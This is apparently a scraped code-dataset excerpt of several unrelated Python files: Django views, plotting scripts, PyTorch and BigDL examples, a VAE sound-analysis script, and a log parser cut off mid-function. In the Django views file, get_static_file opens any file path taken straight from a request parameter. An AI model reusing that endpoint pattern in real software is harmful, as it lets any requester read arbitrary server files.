'')\n selected_product = ProductFeature.objects.filter(name = q)[0]\n attrs_to_remove = ['_state', 'id']\n if field == 'all':\n product_attributes = list(selected_product.__dict__.keys())\n product_attributes = [ele for ele in product_attributes if ele not in attrs_to_remove]\n product_feature_dict = {}\n for attr in product_attributes:\n product_feature_dict[attr] = getattr(selected_product, attr)\n data = json.dumps(product_feature_dict)\n elif field == 'widgets':\n attribute_values = getattr(selected_product, field)\n if attribute_values != 'None':\n widget_list = attribute_values.split(',')\n widget_dict = {}\n for w in widget_list:\n widget_object = Widget.objects.filter(name = w)[0]\n widget_attributes = list(widget_object.__dict__.keys())\n widget_attributes = [ele for ele in widget_attributes if ele not in attrs_to_remove]\n w_inner_dict = {}\n for wattr in widget_attributes:\n w_inner_dict[wattr] = getattr(widget_object, wattr)\n widget_dict[w] = w_inner_dict\n\n result = {field: widget_dict}\n data = json.dumps(result)\n else:\n data = json.dumps({\"widgets\": {\"None\": \"None\"}})\n else:\n data = 'fail'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\ndef get_queryset_attribute_values(qset, attr='name'):\n qlist = []\n for e in qset:\n qlist.append(getattr(e, attr))\n\n return ','.join([q for q in qlist])\n\ndef get_static_file(request):\n if request.is_ajax():\n rfile = request.GET.get('file', '')\n with open(rfile) as json_file:\n data = json.load(json_file)\n \n res = json.dumps(data)\n else:\n res = 'fail'\n mimetype = 'application/json'\n return HttpResponse(res, mimetype)\n\ndef get_enabled_parameters_by_aggp(request):\n if request.is_ajax():\n aggp_type = request.GET.get('aggp_type', '')\n aggp = AggregationPeriod.objects.filter(name=aggp_type)[0]\n data = aggp.enabled_parameters.split(',')\n data = json.dumps(data)\n else:\n data = 'fail'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n\ndef documentation(request):\n return render(request, '_build/html/index.html')\n\ndef getModelObjects(request):\n if request.is_ajax():\n model = request.GET.get('model', '').capitalize()\n obj = importObject(obj_name='products.models.' 
+ model)\n all_objs = obj.objects.all()\n d = {}\n odict = {}\n for o in all_objs:\n odict = {o.name: {'name': o.name, 'enabled': o.enabled}}\n d.update(odict)\n\n result = {'objects': d}\n data = json.dumps(result)\n else:\n data = 'fail'\n \n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\ndef get_analysis_settings(request):\n if True: #request.is_ajax():\n analysis_id = request.GET.get('analysis_id', '')\n analysis = Analysis.objects.filter(id=analysis_id)[0]\n data = analysis.settings_json\n else:\n data = 'fail'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\ndef download(request, pk):\n analysis = get_object_or_404(Analysis, pk = pk)\n file = analysis.file\n return FileResponse(file, as_attachment=True, filename=file.name)","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"253313556","text":"import numpy as np\nimport pandas as pd\nfrom matplotlib import rcParams\nrcParams['font.family'] = 'sans-serif'\nrcParams['font.sans-serif'] = ['Avenir']\nimport matplotlib.pyplot as plt\n\nplt.style.use('ggplot')\n\nresult_path = \"results/experiment_result_10000_data.csv\"\ndata = pd.read_csv(result_path, index_col=[\"order\"])\ndata[\"time_taken\"] = -data[\"time_taken\"]\n\n# 0. Summary Visualization\nfig, axs = plt.subplots(3, 1, figsize=(6, 12))\nmodel_names = [\"SVR/Kernel:linear\", \"SVR/Kernel:poly\", \"SVR/Kernel:rbf\", \"SVR/Kernel:sigmoid\",\n \"MLP/Size:16-16\", \"MLP/Size:32-32\"]\nbar_width = 0.15\nmax_x = 0\nX_labels = None\nfor mi, model_name in enumerate(model_names):\n f = data[data[\"spec\"] == model_name]\n x = np.arange(len(f))\n if len(f) > max_x:\n max_x = len(f)\n X_labels = f[\"window\"]\n xi = x + (mi - 3) / 6\n fr2 = f[\"r2\"]\n fr2[fr2 < 0] = 0\n axs[0].bar(xi, fr2, bar_width, label=model_name)\n fr2s = f[\"r2s\"]\n fr2s[fr2s < 0] = 0\n axs[1].bar(xi, fr2s, bar_width, label=model_name)\n ft = f[\"time_taken\"]\n ft[ft < 0] = 0\n axs[2].bar(xi, ft, bar_width, label=model_name)\n\naxs[0].set_ylabel(\"Adjusted R-Squared\")\naxs[0].set_title(\"(a) Adjusted R-Squared by Architectures\", fontdict={\"fontsize\": 'large'})\naxs[0].set_xticks(np.arange(max_x))\naxs[0].set_xticklabels(X_labels)\n\naxs[1].set_ylabel(\"Smoothed R-Squared\")\naxs[1].set_title(\"(b) Smoothed R-Squared by Architectures\", fontdict={\"fontsize\": 'large'})\naxs[1].set_xticks(np.arange(max_x))\naxs[1].set_xticklabels(X_labels)\n\naxs[2].set_ylabel(\"Time taken\")\naxs[2].set_title(\"(c) Time Taken for Training (ms)\", fontdict={\"fontsize\": 'large'})\naxs[2].set_xticks(np.arange(max_x))\naxs[2].set_xticklabels(X_labels)\n\naxs[2].legend(bbox_to_anchor=(1, -0.7), loc='lower right', fontsize=\"medium\")\n\nfig.tight_layout()\nplt.savefig(\"results/training_results_10000.png\")\n\n# 1. 
by R2\nrawr2 = data[[\"spec\", \"window\", \"r2\"]]\nwindows = np.unique(rawr2[\"window\"])\nmodel_names = [\"SVR/Kernel:linear\", \"SVR/Kernel:poly\", \"SVR/Kernel:rbf\", \"SVR/Kernel:sigmoid\",\n               \"MLP/Size:16-16\", \"MLP/Size:32-32\"]\nrows = []\nfor w in windows:\n    cells = []\n    cells.append(w)\n    for mi, model_name in enumerate(model_names):\n        cv = rawr2[(rawr2['spec'] == model_name) & (rawr2['window'] == w)]['r2']\n        cells.append(cv.values[0])\n    rows.append(cells)\nrows = np.array(rows)\nprint(rows)\n# for latex\nprint(\"\\\\toprule\")\nprint(\"window & \"+\" & \".join(model_names)+\" \\\\\\\\\")\nprint(\"\\\\midrule\")\nfor row in rows:\n    print(\" & \".join([str(np.round(c,2)) for c in row])+\" \\\\\\\\\")\nprint(\"\\\\bottomrule\")\n\n# 2. by Smoothed R2\nsmoor2 = data[[\"spec\", \"window\", \"r2s\"]]\nwindows = np.unique(smoor2[\"window\"])\nmodel_names = [\"SVR/Kernel:linear\", \"SVR/Kernel:poly\", \"SVR/Kernel:rbf\", \"SVR/Kernel:sigmoid\",\n               \"MLP/Size:16-16\", \"MLP/Size:32-32\"]\nrows = []\nfor w in windows:\n    cells = []\n    cells.append(w)\n    for mi, model_name in enumerate(model_names):\n        cv = smoor2[(smoor2['spec'] == model_name) & (smoor2['window'] == w)]['r2s']\n        cells.append(cv.values[0])\n    rows.append(cells)\nrows = np.array(rows)\nprint(rows)\n# for latex\nprint(\"\\\\toprule\")\nprint(\"window & \"+\" & \".join(model_names)+\" \\\\\\\\\")\nprint(\"\\\\midrule\")\nfor row in rows:\n    print(\" & \".join([str(np.round(c,2)) for c in row])+\" \\\\\\\\\")\nprint(\"\\\\bottomrule\")\n\n# 3. forecast\nsetups = [\n    {\"model\": \"svr\", \"kernel\": \"linear\", \"window\": 13, \"outfn\": \"svr_linear_13\"},\n    {\"model\": \"mlp\", \"size\": [32, 32], \"window\": 13, \"outfn\": \"mlp_32-32_13\"},\n    {\"model\": \"svr\", \"kernel\": \"linear\", \"window\": 10, \"outfn\": \"svr_linear_10\"},\n    {\"model\": \"mlp\", \"size\": [32, 32], \"window\": 10, \"outfn\": \"mlp_32-32_10\"}\n]\ncounties = [\n    \"Cook/Illinois\",\n    \"Lake/Illinois\"\n]\ncolor_maps = [\"steelblue\", \"palevioletred\"]\nn_regions = len(counties)\nfor setup in setups:\n    data = pd.read_csv(\"results/\" + setup[\"outfn\"] + \".csv\")\n    fig, axs = plt.subplots(1, n_regions, figsize=(7, 3))\n    for ci, county in enumerate(counties):\n        f = data[data[\"region\"] == county]\n        pred = f[\"forecast\"]\n        true = f[\"true\"]\n        smoo = f[\"smoothed\"]\n        x = np.arange(len(pred))\n        axs[ci].plot(x, pred, color=color_maps[ci], linewidth=1, label=\"Forecast\")\n        axs[ci].plot(x, true, color=color_maps[ci], linewidth=1, label=\"Raw\", linestyle=\"dotted\")\n        axs[ci].plot(x, smoo, color=color_maps[ci], linewidth=1, label=\"Smoothed\", linestyle=\"dashed\")\n        axs[ci].set_ylabel(\"Increment of cases\")\n        axs[ci].set_xlabel(\"Days since Jan. 
1, 2020\")\n        axs[ci].set_title(county, fontdict={\"fontsize\": 'large'})\n        axs[ci].legend(fontsize=\"medium\")\n    fig.tight_layout()\n    plt.savefig(\"results/fig_\" + setup[\"outfn\"] + \".png\")\n","sub_path":"exp/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":4723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"231343417","text":"from __future__ import print_function, division\nimport os\nimport torch\nimport pandas as pd\nfrom skimage import io, transform\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\n\ndtype = torch.float\ndevice = torch.device(\"cpu\")\n\n\"\"\"Possible improvements matching with last name to determine families.\"\"\"\n\"\"\"Data managing\"\"\"\ndata_train = pd.read_csv(\"../input/train.csv\")\ndata_test = pd.read_csv(\"../input/test.csv\")\n\n\"\"\"Only takes numbers.\n   Needed columns: 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Cabin'\n   Embarked is not important because no matter what you still fall into \n   a certain class in a ship and you still have a set number of people\n   travelling with you. Where you boarded does not matter, it's not like\n   if you boarded on a certain location you are close to the top of the ship.\"\"\"\n#Fix Cabin and Sex\n\"\"\"for idx in range(0, len(data_train['Sex'])):\n    if (data_train['Sex'][idx] == 'male'):\n        data_train['Sex'][idx] = '0'\n\"\"\"\n\nx = np.array(data_train.loc[:, ['Pclass', 'Age', 'SibSp', 'Parch']])\n#x.astype(np.double)\nx = torch.from_numpy(x).float() #cast to float32 so mm() matches the float32 weights\ny = np.array(data_train['Survived'])\ny = torch.from_numpy(y).float().reshape(-1, 1) #shape (N, 1) to match y_pred\n#x = torch.from_numpy(np.array(data_train.loc[:, data_train.columns != 'Survived']))\n\n\"\"\"Neural Network specifics\"\"\"\ninp_layer = 4; #Each node corresponds to number of features\nH = 3; #Mean of number of neurons in input and output layer\nout_layer = 1; #Classifier\n\nbatch_size = 70; #Number of processed samples before updating model\n\n#Weights\nweight_1 = torch.randn(inp_layer, H, device=device, dtype=dtype)\nweight_2 = torch.randn(H, out_layer, device=device, dtype=dtype)\n\nlearning_rate = 1e-6\nprint (x.shape)\nprint (weight_1.shape)\n\nprint (type(x))\nprint (type(weight_1))\n\nfor trial in range(500):\n    #Forward pass: Compute y\n    xw = x.mm(weight_1)\n    xw_relu = xw.clamp(min=0)#ReLU applied to x . 
w (dot product)\n    y_pred = xw_relu.mm(weight_2)#output prediction after hidden layer (dot product)\n    \n    #Compute and print loss\n    loss = (y_pred - y).pow(2).sum().item()\n    print(trial, loss)\n    \n    #Backprop to compute gradients of weights wrt losses\n    grad_y_pred = 2.0 * (y_pred - y)\n    grad_weight2 = xw_relu.t().mm(grad_y_pred)\n    grad_xw_relu = grad_y_pred.mm(weight_2.t())\n    grad_xw = grad_xw_relu.clone()\n    grad_xw[xw < 0] = 0\n    grad_weight1 = x.t().mm(grad_xw)\n    \n    #Update weights - Gradient Descent \n    weight_1 -= learning_rate * grad_weight1\n    weight_2 -= learning_rate * grad_weight2","sub_path":"titanic_torch.py","file_name":"titanic_torch.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"489775885","text":"#\n# Copyright 2016 The BigDL Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport torch\nfrom torchvision.models import resnet18\n\nif __name__ == \"__main__\":\n    model_ft = resnet18(pretrained=True)\n\n    x = torch.rand(2, 3, 224, 224)\n\n    # Accelerated Inference Using JIT / JIT+IPEX\n    from bigdl.nano.pytorch import InferenceOptimizer\n    jit_model = InferenceOptimizer.trace(model_ft,\n                                         accelerator=\"jit\",\n                                         input_sample=torch.rand(1, 3, 224, 224))\n\n    # Save Optimized JIT Model\n    # The saved model files will be saved at \"./optimized_model_jit\" directory\n    # There are 2 files in optimized_model_jit, users only need to take \"ckpt.pth\" file for further usage:\n    #   nano_model_meta.yml: meta information of the saved model checkpoint\n    #   ckpt.pth: JIT model checkpoint for general use, describes model structure\n    InferenceOptimizer.save(jit_model, \"./optimized_model_jit\")\n\n    # Load the Optimized Model\n    loaded_model = InferenceOptimizer.load(\"./optimized_model_jit\")\n\n    # Inference with the Loaded Model\n    with InferenceOptimizer.get_context(loaded_model):\n        y_hat = loaded_model(x)\n        predictions = y_hat.argmax(dim=1)\n        print(predictions)\n","sub_path":"python/nano/tutorial/inference/pytorch/pytorch_save_and_load_jit.py","file_name":"pytorch_save_and_load_jit.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"329142696","text":"from django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\n\nfrom api.models import Event\nfrom web.forms.event_form import AddEvent\nfrom web.processors.event import create_or_update_event, get_event\n\ndef index(request):\n\treturn render_to_response(\n\t\t'pages/index.html',\n\t\t{'test': 'test'},\n\t\tcontext_instance=RequestContext(request))\n\ndef add_event(request):\n\tevent_form = AddEvent()\n\tif request.method ==\"POST\":\n\t\tevent_form = AddEvent(data=request.POST, files=request.FILES)\n\t\tif event_form.is_valid():\n\t\t\tevent_data = {}\n\t\t\tevent_data.update(event_form.cleaned_data)\n\t\t\tevent = 
create_or_update_event(**event_data)\n\t\t\treturn render_to_response(\n\t\t\t\t\t'pages/thankyou.html',\n\t\t\t\t\t{'title': event.title, 'event_id': event.id},\n\t\t\t\t\tcontext_instance=RequestContext(request))\n\tcontext = {\"form\": event_form}\n\treturn render_to_response(\"pages/add_event.html\", context, context_instance=RequestContext(request))\n\ndef view_event(request, event_id):\n\tevent = get_object_or_404(Event, pk=event_id)\n\tcontext = {'event': event}\n\treturn render_to_response(\"pages/view_event.html\", context, context_instance=RequestContext(request))\n\ndef search_event(request):\n\tpass\n\ndef thankyou(request):\n\treturn render_to_response('pages/thankyou.html')\n","sub_path":"codeweekeu/web/views/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"447496683","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.7.0\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# +\nimport torch\n\nimport torch.utils.data\nfrom torch import nn, optim\nfrom torch.nn import functional as F\nfrom torchvision import datasets, transforms\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\nfrom sklearn.decomposition import FastICA\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\n# -\n\n\nfrom modules.dataset import SoundDataset\nfrom modules.myfunc import ans2index_label_color_marker\nfrom modules.success_and_false import result, results_list\n\n\nclass VAE_without_label(nn.Module):\n def __init__(self,input_shape,z_shape=20,output_shape=11):\n super(VAE_without_label, self).__init__()\n \n self.input_shape = input_shape\n self.z_shape = z_shape\n self.output_shape = output_shape\n \n # encoder\n self.encoder = nn.Sequential()\n self.encoder.add_module('enc_conv1', nn.Conv1d(in_channels=3, out_channels=9, kernel_size=16, stride=10, padding=6, padding_mode='zeros'))\n self.encoder.add_module('enc_relu1', nn.ReLU(True))\n self.encoder.add_module('enc_conv2', nn.Conv1d(in_channels=9, out_channels=9, kernel_size=16, stride=10, padding=6, padding_mode='zeros'))\n self.encoder.add_module('enc_relu2', nn.ReLU(True))\n self.encoder.add_module('enc_conv3', nn.Conv1d(in_channels=9, out_channels=9, kernel_size=16, stride=10, padding=6, padding_mode='zeros'))\n self.encoder.add_module('enc_relu3', nn.ReLU(True))\n # z to mean\n self.encmean_fc11 = nn.Linear(int(input_shape/10/10/10*9), z_shape)\n # z to var\n self.encvar_fc12 = nn.Linear(int(input_shape/10/10/10*9), z_shape)\n \n # decoder\n self.dec_fc1 = nn.Linear(z_shape, int(input_shape/10/10/10*9))\n self.decoder = nn.Sequential()\n self.decoder.add_module('dec_deconv1', nn.ConvTranspose1d(in_channels=9, out_channels=9, kernel_size=16, stride=10, padding=3, padding_mode='zeros'))\n self.decoder.add_module('dec_relu1', nn.ReLU(True))\n self.decoder.add_module('dec_deconv2', nn.ConvTranspose1d(in_channels=9, out_channels=9, kernel_size=16, stride=10, padding=3, padding_mode='zeros'))\n self.decoder.add_module('dec_relu2', nn.ReLU(True))\n self.decoder.add_module('dec_deconv3', nn.ConvTranspose1d(in_channels=9, out_channels=3, kernel_size=16, stride=10, padding=3, padding_mode='zeros'))\n self.decoder.add_module('dec_sig1', nn.Sigmoid())\n \n def encode(self, x):\n x = x.view(x.size()[0],3,-1)\n x = 
self.encoder(x)\n x = x.view(x.size()[0], -1)\n return self.encmean_fc11(x), self.encvar_fc12(x)\n\n def reparameterize(self, mu, logvar):\n std = torch.exp(0.5*logvar)\n eps = torch.randn_like(std)\n return mu + eps*std\n \n def decode(self, z):\n x = self.dec_fc1(z)\n x = x.view(x.size()[0],9,-1)\n x = self.decoder(x)\n x = x.view(x.size()[0],3,-1)\n return x\n\n def forward(self, x):\n # encode\n mu, logvar = self.encode(x.view(-1, 3, self.input_shape).float())\n # reparameterize\n z = self.reparameterize(mu, logvar)\n pre_x = self.decode(z)\n \n return pre_x, mu, logvar\n \n def valid(self, x):\n mu, logvar = self.encode(x.view(-1, 3, self.input_shape).float())\n pre_x = self.decode(mu)\n \n return pre_x, mu, logvar\n \n def loss_function_vae(self, rec_x, x, mu, logvar, beta=2):\n BCE = F.binary_cross_entropy(rec_x, x.float(), reduction='sum')\n KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n return BCE + KLD * beta\n\n\nclass VAE_without_label_trainer():\n def __init__(self, dim_z = 20, device=\"cuda\"):\n # prepare cuda device\n self.device = torch.device(device if torch.cuda.is_available() else \"cpu\")\n #self.device = torch.device(\"cpu\")\n # prepare dataset\n self.dataset = SoundDataset(transform=transforms.ToTensor())\n # define model\n self.model = VAE_without_label(self.dataset.data_size, dim_z).to(self.device)\n # define optimizer\n self.optimizer = optim.Adam(self.model.parameters(), lr=1e-3)\n self.dim_z = dim_z\n \n #def __del__(self):\n # self.save_weight()\n \n def load(self, key):\n self.dataset.load(\"../data/sounds/raw/sub1\", key, 0)\n self.dataset.load(\"../data/sounds/raw/sub2\", key, 1)\n self.dataset.load(\"../data/sounds/raw/sub3\", key, 2)\n self.dataset.load(\"../data/sounds/raw/sub4\", key, 3)\n self.dataset.load(\"../data/sounds/raw/sub5\", key, 4)\n self.dataset.load(\"../data/sounds/raw/sub6\", key, 5)\n self.dataset.load(\"../data/sounds/raw/sub7\", key, 6)\n self.dataset.load(\"../data/sounds/raw/sub8\", key, 7)\n self.dataset.load(\"../data/sounds/raw/sub9\", key, 8)\n self.dataset.load(\"../data/sounds/raw/sub10\", key, 9)\n self.dataset.load(\"../data/sounds/raw/sub11\", key, 10)\n self.dataset.normalize()\n \n def train(self, epoch, max_epoch):\n # train mode\n self.model.train()\n train_loss = 0\n for batch_idx, (x, y) in enumerate(self.train_loader):\n x = x.to(self.device)\n # zero the parameter gradients\n self.optimizer.zero_grad()\n\n # forward\n rec_x, mu, logvar = self.model(x)\n loss = self.model.loss_function_vae(rec_x, x, mu, logvar)\n # backward\n loss.backward()\n # update the parameter\n self.optimizer.step()\n # logging\n train_loss += loss.item()\n if batch_idx % 1 == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(x), len(self.train_loader.dataset),\n 100. 
* batch_idx / len(self.train_loader),\n loss.item() / len(x)))\n \n train_loss /= len(self.train_loader.dataset)\n print('====> Epoch: {} Average loss: {:.4f}'.format(epoch, train_loss))\n \n return train_loss\n\n def valid(self, epoch):\n # test mode\n self.model.eval()\n valid_loss = 0\n # test mode\n with torch.no_grad():\n for i, (x, y) in enumerate(self.valid_loader):\n x = x.to(self.device)\n rec_x, mu, logvar = self.model.valid(x)\n loss = self.model.loss_function_vae(rec_x, x, mu, logvar)\n valid_loss += loss.item()\n\n valid_loss /= len(self.valid_loader.dataset)\n print('====> Validation set loss: {:.4f}'.format(valid_loss))\n \n return valid_loss\n \n def auto_train(self, max_epoch, save_path = '../result/VAE/model'):\n train_set, valid_set = torch.utils.data.random_split(self.dataset, [int(len(self.dataset)*0.8), len(self.dataset) - int(len(self.dataset)*0.8)])\n self.train_loader = torch.utils.data.DataLoader(train_set,batch_size=10,shuffle=True)\n self.valid_loader = torch.utils.data.DataLoader(valid_set,batch_size=10,shuffle=True)\n \n train_loss = []\n valid_loss = []\n for epoch in range(1,max_epoch):\n t_loss = self.train(epoch, max_epoch)\n v_loss = self.valid(epoch)\n train_loss.append(t_loss)\n valid_loss.append(v_loss)\n # plot result\n fig, ax = plt.subplots(1,1,figsize=(8, 4))\n ax.set_title('Loss')\n ax.set_xlabel('Epochs')\n ax.set_ylabel('Loss')\n ax.plot(range(1,max_epoch),train_loss,label=\"train\")\n ax.plot(range(1,max_epoch),valid_loss,label=\"validation\")\n \n plt.legend()\n plt.tight_layout()\n plt.savefig(save_path+'/loss.png')\n plt.close()\n \n def save_weight(self, save_path = '../result/VAE/model/vae'):\n torch.save(self.model.state_dict(), save_path)\n \n def load_weight(self, load_path = '../result/VAE/model/vae'):\n self.model.load_state_dict(torch.load(load_path))\n \n \n def plot_z(self, save_path='../result/VAE/model/result.png'):\n # print z all data\n loader = torch.utils.data.DataLoader(self.dataset,batch_size=len(self.dataset),shuffle=False)\n all_z = []\n all_ans = []\n self.model.eval()\n with torch.no_grad():\n for i, (data, ans) in enumerate(loader):\n data = data.to(self.device)\n _, mu, logvar = self.model.forward(data)\n all_z = np.append(all_z, mu.to('cpu').clone().numpy())\n all_ans = np.append(all_ans, ans.to('cpu').clone().numpy())\n\n all_z = np.array(all_z).reshape(-1, self.model.z_shape)\n all_ans = np.array(all_ans).reshape(-1)\n \n # LDA\n self.lda = LDA(n_components = 2)\n self.lda.fit(all_z, all_ans)\n lda_z = self.lda.transform(all_z)\n lda_z = lda_z.transpose()\n \n z_xrange = [np.min(lda_z[0]), np.max(lda_z[0])]\n z_yrange = [np.min(lda_z[1]), np.max(lda_z[1])] \n plot_z(lda_z[0], lda_z[1], all_ans, \"z map\", save_path.split('.png')[0] + '_LDA.png', z_xrange, z_yrange)\n plot_z_each(lda_z, all_ans, self.dataset.filenames, '../data/succeed_list.csv', \"z map\",\n save_path.split('.png')[0] + '_LDA_each.png', z_xrange, z_yrange)\n \n # ICA\n self.ica = FastICA(n_components = 2)\n self.ica.fit(all_z)\n ica_z = self.ica.transform(all_z)\n ica_z = ica_z.transpose()\n \n z_xrange = [np.min(ica_z[0]), np.max(ica_z[0])]\n z_yrange = [np.min(ica_z[1]), np.max(ica_z[1])] \n plot_z(ica_z[0], ica_z[1], all_ans, \"z map\", save_path.split('.png')[0] + '_ICA.png', z_xrange, z_yrange)\n plot_z_each(ica_z, all_ans, self.dataset.filenames, '../data/succeed_list.csv', \"z map\",\n save_path.split('.png')[0] + '_ICA_each.png', z_xrange, z_yrange)\n \n def reconstruct(self, save_path = '../result/VAE/reconstructed_sounds'):\n loader = 
torch.utils.data.DataLoader(self.dataset,batch_size=1,shuffle=False)\n self.model.eval()\n with torch.no_grad():\n for i, (x, y) in enumerate(loader):\n x = x.to(self.device)\n recon_x, _, _ = self.model.forward(x)\n recon_x = recon_x.to('cpu').clone().numpy()\n x = x.to('cpu').clone().numpy()\n x = x.reshape(3, -1)\n recon_x = recon_x.reshape(3, -1)\n # to png\n fig, ax = plt.subplots(2,3,figsize=(24, 12))\n ax[0][0].set_title('L')\n ax[0][1].set_title('C')\n ax[0][2].set_title('R')\n ax[1][0].set_title('reconstructed L')\n ax[1][1].set_title('reconstructed C')\n ax[1][2].set_title('reconstructed R')\n time = range(len(x[0]))\n for j in range(3):\n ax[0][j].set_ylim(0, 1)\n ax[1][j].set_ylim(0, 1)\n ax[0][j].plot(time, x[j], linewidth = 1)\n ax[1][j].plot(time, recon_x[j], linewidth = 1)\n plt.tight_layout()\n plt.savefig(save_path + '/' + self.dataset.filenames[i].split('.csv')[0] + '.png')\n plt.close()\n # to csv\n save_data = pd.DataFrame(data = recon_x)\n save_data.to_csv(save_path + '/'+ self.dataset.filenames[i], index = False)\n\n\ndef plot_z(x, y, ans, title, save_path, xrange=None, yrange=None):\n plt.figure(figsize=(8, 8))\n if xrange is not None:\n plt.xlim(xrange[0], xrange[1])\n if yrange is not None:\n plt.ylim(yrange[0], yrange[1])\n idxs, labels, colors, markers = ans2index_label_color_marker(ans)\n for i, (label, color, marker) in enumerate(zip(labels,colors,markers)):\n plt.scatter(x[idxs[i]:idxs[i+1]], y[idxs[i]:idxs[i+1]], label=label, s=10, color=color, marker=marker)\n plt.title(title)\n plt.legend()\n plt.tight_layout()\n plt.savefig(save_path)\n plt.close()\n\n\ndef plot_z_each(data, ans, names, sf_filepath, title, save_path, xrange=None, yrange=None):\n data_list = results_list(data, ans, names)\n data_list.classify(sf_filepath)\n \n # the number of the classes == 11\n fig, ax = plt.subplots(4, 3, figsize=(24,32))\n for i in range(0,12):\n ax[i//3][i%3].set_title(str(i), fontsize=20)\n if xrange is not None:\n for i in range(0,12):\n ax[i//3][i%3].set_xlim(xrange[0], xrange[1])\n if yrange is not None:\n for i in range(1,12):\n ax[i//3][i%3].set_ylim(yrange[0], yrange[1])\n \n idxs, labels, colors, markers = ans2index_label_color_marker(ans)\n for i, (label, color, marker) in enumerate(zip(labels,colors,markers)):\n ax[0][0].scatter(data[0,idxs[i]:idxs[i+1]], data[1,idxs[i]:idxs[i+1]], label=label, s=20, color=color, marker=marker)\n ax[0][0].legend()\n ax[0][0].set_title(title, fontsize=20)\n \n for i, (result, label, color) in enumerate(zip(data_list,labels,colors)):\n if len(result.success) > 0:\n ax[(i+1)//3][(i+1)%3].scatter(result.success[:,0], result.success[:,1], label=label, s=20, color=color, marker='.')\n if len(result.false) > 0:\n ax[(i+1)//3][(i+1)%3].scatter(result.false[:,0], result.false[:,1], label=label, s=20, color=color, marker='x')\n ax[(i+1)//3][(i+1)%3].legend()\n\n plt.tight_layout()\n plt.savefig(save_path)\n plt.close()\n\n\nvae = VAE_without_label_trainer()\nvae.load_weight(load_path = '../result/VAE_without_label/drive/vae')\nvae.load('drive')\n#vae.auto_train(1000, save_path = '../result/VAE_without_label/drive')\nvae.plot_z(save_path = '../result/VAE_without_label/drive/z_map.png')\n#vae.reconstruct()\n#vae.save_weight(save_path = '../result/VAE_without_label/drive/vae')\ndel vae\n\nvae = VAE_without_label_trainer()\nvae.load_weight(load_path = '../result/VAE_without_label/block/vae')\nvae.load('block')\n#vae.auto_train(1000, save_path = '../result/VAE_without_label/block')\nvae.plot_z(save_path = 
'../result/VAE_without_label/block/z_map.png')\n#vae.reconstruct()\n#vae.save_weight(save_path = '../result/VAE_without_label/block/vae')\ndel vae\n\nvae = VAE_without_label_trainer()\nvae.load_weight(load_path = '../result/VAE_without_label/push/vae')\nvae.load('push')\n#vae.auto_train(1000, save_path = '../result/VAE_without_label/push')\nvae.plot_z(save_path = '../result/VAE_without_label/push/z_map.png')\n#vae.reconstruct()\n#vae.save_weight(save_path = '../result/VAE_without_label/push/vae')\ndel vae\n\nvae = VAE_without_label_trainer()\nvae.load_weight(load_path = '../result/VAE_without_label/stop/vae')\nvae.load('stop')\n#vae.auto_train(1000, save_path = '../result/VAE_without_label/stop')\nvae.plot_z(save_path = '../result/VAE_without_label/stop/z_map.png')\n#vae.reconstruct()\n#vae.save_weight(save_path = '../result/VAE_without_label/stop/vae')\ndel vae\n\nvae = VAE_without_label_trainer()\nvae.load_weight(load_path = '../result/VAE_without_label/flick/vae')\nvae.load('flick')\n#vae.auto_train(1000, save_path = '../result/VAE_without_label/flick')\nvae.plot_z(save_path = '../result/VAE_without_label/flick/z_map.png')\n#vae.reconstruct()\n#vae.save_weight(save_path = '../result/VAE_without_label/flick/vae')\ndel vae\n\n\n","sub_path":"src/vae_without_label.py","file_name":"vae_without_label.py","file_ext":"py","file_size_in_byte":15617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"522029285","text":"import re\r\n\r\n#[Fri Oct 28 05:43:38.294803 2016] [ssl:warn] [pid 4500:tid 304] AH01909: www.example.com:443:0 server certificate does NOT include an ID which matches the server name\r\n\r\np=r'^\\[(?P<dow>[a-zA-Z]{3}) (?P<month>[a-zA-Z]{3}) (?P<day>[\\d]{1,2}) (?P<time>\\b[\\d:\\.]+\\b) (?P<year>[\\d]{4})\\] \\[(?P<error>[\\w:]+)\\] \\[(?P<pid>[\\w: ]+)\\] (?P<msg>.+)$'\r\n\r\nreo = re.compile(p)\r\nfh = open('error.log')\r\n\r\ndata ={}\r\n\r\nfor line in fh:\r\n    m = reo.search(line)\r\n    if m:\r\n        error_list = data.get(m.group('error'), None)\r\n        if not error_list:\r\n            